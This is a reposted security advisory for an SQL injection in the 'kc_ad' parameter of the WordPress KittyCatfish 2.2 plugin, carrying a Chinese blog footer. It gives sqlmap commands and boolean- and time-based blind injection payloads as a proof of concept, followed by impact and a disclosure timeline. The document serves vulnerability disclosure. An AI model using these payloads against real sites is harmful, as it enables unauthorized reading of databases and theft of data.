WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description

An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.

The get oarameter ‘kc_ad’ is vulnerable.

2. Proof of concept

sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""  —dbms —threads=10 —random-agent

OR

sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" —dbms —threads=10 —random-agent —dbms=mysql   —level 5 —risk=3
  
Parameter: kc_ad (GET)
  
    Type: boolean-based blind
  
    Title: AND boolean-based blind - WHERE or HAVING clause
  
    Payload: kc_ad=31 AND 2281=2281&ver=2.0
  
   
  
    Type: AND/OR time-based blind
  
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  
    Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0

3. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

4. Impact

Critical

5. Affected versions

<= 2.2 6. Disclosure timeline 06-Mar-2017 - found the vulnerability 06-Mar-2017 - informed the developer 20-Mar-2017 - release date of this security advisory Not fixed at the date of submitting this exploit.

本文固定链接: https://www.unhonker.com/bug/1991.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2017年04月26日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability | 90' s Blog|关注网络信息安全
关键字:

WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!